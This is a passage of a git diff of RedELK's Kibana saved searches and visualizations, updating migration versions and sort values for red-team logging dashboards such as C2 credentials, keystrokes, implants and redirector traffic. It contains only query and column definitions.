"kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2190], "type": "search", "version": "1"} -{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2193], "type": "search", "version": "1"} -{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2196], "type": "search", "version": "1"} \ No newline at end of file +{"attributes": {"columns": ["infra.attack_scenario", "agent.hostname", "redir.backend.name", "source.ip", "source.domain", "source.as.organization.name", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Redirector Traffic", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363345688, 1259], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1262], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "c2.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"events_joinleave\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"events_joinleave\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"credentials\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"credentials\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"keystrokes\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"downloads\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"downloads\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - _Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[4].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[5].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1270], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "file.directory", "file.name", "file.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"value\":\"downloads\",\"params\":{\"query\":\"downloads\",\"type\":\"phrase\"},\"disabled\":false,\"alias\":null,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"downloads\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Downloads", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1273], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "c2.message", "keystrokes.url"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"keystrokes\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"keystrokes\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Keystrokes", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3afbdbc0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1276], "type": "search", "version": "1"} +{"attributes": {"columns": ["creds.realm", "creds.username", "creds.credential", "creds.host", "creds.source"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Credentials", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "3fabe620-6c38-11ea-97d6-55783aed877a", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "credentials", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363345688, 1278], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "user.name", "host.name", "ioc.type", "file.hash.md5", "file.name", "file.size", "ioc.domain"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1281], "type": "search", "version": "1"} +{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1284], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363345688, 1286], "type": "search", "version": "1"} +{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363345688, 1288], "type": "search", "version": "1"} +{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363345688, 1290], "type": "search", "version": "1"} +{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363345688, 1292], "type": "search", "version": "1"} +{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1645363345688, 1294], "type": "search", "version": "1"} +{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1297], "type": "search", "version": "1"} +{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1300], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1645363345688, 1303], "type": "search", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson index 1942ef49..a7c19c21 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson @@ -1,47 +1,47 @@ -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2209], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2211], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.2", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642152856829, 2212], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": 